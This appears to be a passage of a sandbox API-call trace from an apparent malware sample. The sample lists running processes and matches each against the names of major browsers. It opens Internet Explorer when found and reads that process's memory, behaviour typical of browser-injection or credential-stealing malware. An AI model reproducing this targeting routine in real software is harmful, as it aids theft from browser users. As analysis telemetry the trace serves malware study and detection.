	[0213.067] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.067] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0213.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3f50
	[0213.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.068] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.069] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.069] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.070] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.070] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0213.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3f54
	[0213.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.071] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0213.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.071] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.071] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0213.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.072] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.072] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3f58
	[0213.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.073] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.073] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.073] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.074] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.074] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0213.075] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3f5c
	[0213.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.075] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0213.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.075] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.075] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0213.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.076] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.076] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0213.077] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3f60
	[0213.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.077] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0213.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.077] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.078] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0213.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.078] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.078] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0213.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3f64
	[0213.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.079] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0213.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.079] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.079] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0213.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.080] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.080] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0213.081] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3f68
	[0213.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.081] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0213.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.081] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.082] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0213.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.082] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.082] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0213.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0213.083] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0213.084] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3f6c
	[0213.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.084] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0213.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.084] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.085] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0213.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.086] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.086] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0213.087] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3f70
	[0213.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.087] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0213.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.087] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.088] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0213.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.088] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.088] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0213.089] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3f74
	[0213.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.090] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0213.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.090] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.090] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0213.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.091] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.091] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0213.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3f78
	[0213.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.092] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0213.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.092] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.092] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0213.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.093] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.093] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0213.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3f7c
	[0213.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.094] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0213.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.094] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.095] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0213.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.095] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.096] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0213.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3f80
	[0213.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.097] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0213.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.097] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.098] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0213.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.098] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.098] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0213.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3f84
	[0213.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.099] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0213.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.099] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.100] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0213.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.100] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.101] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0213.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3f88
	[0213.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.101] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0213.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.102] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.102] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0213.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.103] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.103] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0213.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3f8c
	[0213.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.104] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0213.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.104] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.104] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0213.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.105] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.105] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0213.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3f90
	[0213.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.106] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0213.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.106] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.106] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0213.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.107] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.107] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0213.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3f94
	[0213.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.108] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0213.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.108] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.109] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0213.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.109] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.109] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0213.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3f98
	[0213.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.110] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0213.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.111] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.112] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0213.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.113] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.113] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0213.114] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3f9c
	[0213.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.114] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0213.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.115] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.115] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0213.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.116] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.116] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0213.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3fa0
	[0213.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.117] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0213.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.117] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.118] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0213.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.119] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.119] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0213.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3fa4
	[0213.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.120] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0213.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.121] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.121] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0213.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.122] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.122] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0213.123] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3fa8
	[0213.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.123] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0213.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.123] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0213.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.123] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0213.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.124] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.124] NtQueryInformationProcess (in: ProcessHandle=0x3fa8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0213.124] ReadProcessMemory (in: hProcess=0x3fa8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0213.124] ReadProcessMemory (in: hProcess=0x3fa8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0213.124] ReadProcessMemory (in: hProcess=0x3fa8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0213.124] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
